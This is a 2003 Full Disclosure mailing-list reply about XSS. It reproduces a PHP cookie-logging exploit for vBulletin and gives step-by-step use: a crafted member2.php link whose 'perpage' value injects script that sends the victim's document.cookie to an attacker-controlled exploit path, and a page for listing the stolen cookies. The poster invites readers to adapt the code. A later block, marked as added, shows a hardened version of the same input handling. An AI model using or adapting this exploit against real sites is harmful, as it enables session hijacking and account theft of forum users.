Full Disclosure mailing list archives

Re: Search Engine XSS


From: "bobby manly" <bobbymanly () hotmail com>
Date: Thu, 24 Jul 2003 05:48:49 +0000


So why not show one of these legitimate examples instead of the overused window popup script?

It would just be easier to ascertain the level of severity if an actual DoS string or this "trusted internal call" was exploited.

I am sure there are a lot of forms that can be a victim of a xss string, but how many of them can actually be used for anything useful (from an attacker point of view)?


XSS can be used for a few different things, one of which would be to steal cookies / logins

(please read cgisecurity.com stuff.. )

i believe some of the reason dat w00d gets so much shit is because some of those XSS don't mean shit unless it targets an admin that is somehow logged in with valid stuffz in his cookie (but i did learn some other cool iframe stuff from him (and others) so _i_ don't give him shit))(did i miss a ')'?) . heh

anyways, there is some web stuff that stores too much stuff in the cookie (or insecurely) such as logins,

so you can do a document.location and add the document.cookie as variables ... and send his cookie somewhere (usually have to get them to click a link on site, in email, etc) and you can have a nice lil php to grab cookie content and then redirect to a new site.. here is some code that has helped me to lurn.. it's not specific to this vbulletin exploit (well kinda).. here is what was posted to the net, you will have to modify to fit your needs.. credits in the code :

---------------------------
<?PHP
    // vBulletin XSS Injection Vulnerability: Exploit
    // ---
    // Coded By : Sp.IC (SpeedICNet () Hotmail Com).
    // Description: Fetching vBulletin's cookies and storing it into a log file.

    // Variables:

    $LogFile = "Cookies.Log";

    // Functions:
    /*
    If ($HTTP_GET_VARS['Action'] = "Log") {
        $Header = "<!--";
        $Footer = "--->";
    }
    Else {
        $Header = "";
        $Footer = "";
    }
    Print ($Header);
    */
    Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
    Print ("<Pre>");
    Print ("<Center>");
    Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
    Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet () Hotmail Com\">Sp.IC</A></B><Hr Width=\"20%\">");
    /*
    Print ($Footer);
    */

    Switch ($HTTP_GET_VARS['Action']) {
        Case "Log":
            $Data = $HTTP_GET_VARS['Cookie'];
            $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));
            $Log = FOpen ($LogFile, "a+");
            FWrite ($Log, Trim ($Data) . "\n");
            FClose ($Log);
            Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
        Break;
        Case "List":
            If (!File_Exists ($LogFile) || !In_Array ($Records)) {
                Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
                Exit ();
            }
            Else {
                Print ("</Center></Pre>");
                $Records = Array_UniQue (File ($LogFile));
                Print ("<Pre>");
                Print ("<B>.:: Statics</B>\n");
                Print ("\n");
                Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
                Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n");
                Print ("\n");

                Print ("<B>.:: Options</B>\n");
                Print ("\n");

                If (Count (File ($LogFile)) > 0) {
                    $Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";
                }
                Else {
                    $Link['Download'] = "[No Records in Log]";
                }

                Print ("o Download Log : " . $Link['Download'] . "\n");
                Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
                Print ("\n");
                Print ("<B>.:: Records</B>\n");
                Print ("\n");

                While (List ($Line[0], $Line[1]) = Each ($Records)) {
                    Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
                }
            }

            Print ("</Pre>");
        Break;
        Case "Delete":
            @UnLink ($LogFile);
            Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
            Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
        Break;
    }
?>

- Give a victim this link: member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]

- Note: You can replace [Script Code] with: --><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+(document.cookie);</Script>

- Then go to Http://[Exploit Path]?Action=List

--------------------------------



what's funny is that @ the time this came out, there was also script injection possible in the <b> tag of the actual forum message, so you could do some OnMouse.over junk to help hide the actual url .. heh


.. i would say any XSS would be worth a look.. but not all will actually get you shit


later,

kid
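As an added, defensive example (not from the original post and not vBulletin's own code), here is a reflected "perpage" value of the kind the quoted link relies on, handled the vulnerable way beside the hardened way, plus a session cookie set with HttpOnly so that a document.cookie read no longer yields the login. Function names, the cookie name and the default value are assumptions; setcookie's options array needs PHP 7.3 or later.

```php
<?php
// Added example, not vBulletin's code and not from the original post.
// It reflects a "perpage" query value the way the quoted link relies on,
// then shows the same value handled safely. Names are assumptions.

// Vulnerable pattern: the raw value lands in an HTML comment and in the
// page body, so "--><Script>...</Script>" breaks out and executes.
function render_perpage_unsafe(string $perpage): string {
    return "<!-- perpage: " . $perpage . " -->"
         . "<b>Showing " . $perpage . " per page</b>";
}

// Hardened pattern: accept only a small integer (the value has no business
// being anything else) and HTML-encode whatever is still reflected.
function render_perpage_safe(string $perpage): string {
    $n = filter_var($perpage, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 1, 'max_range' => 100]]);
    if ($n === false) {
        $n = 20; // constructed default when the value is rejected
    }
    $shown = htmlspecialchars((string) $n, ENT_QUOTES, 'UTF-8');
    return "<b>Showing " . $shown . " per page</b>";
}

// Session cookie marked HttpOnly: even if script does run, document.cookie
// no longer exposes it. Secure and SameSite narrow the exposure further.
// Cookie name is a placeholder; the options array needs PHP 7.3 or later.
function set_session_cookie(string $sid): bool {
    return setcookie('SESSION_COOKIE_NAME', $sid, [
        'expires'  => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Constructed test value in the shape quoted in the post; the body is inert.
$probe = "--><Script>/* would run here */</Script>";
echo render_perpage_unsafe($probe), "\n";  // script tag reaches the browser intact
echo render_perpage_safe($probe), "\n";    // "<b>Showing 20 per page</b>"
```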


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

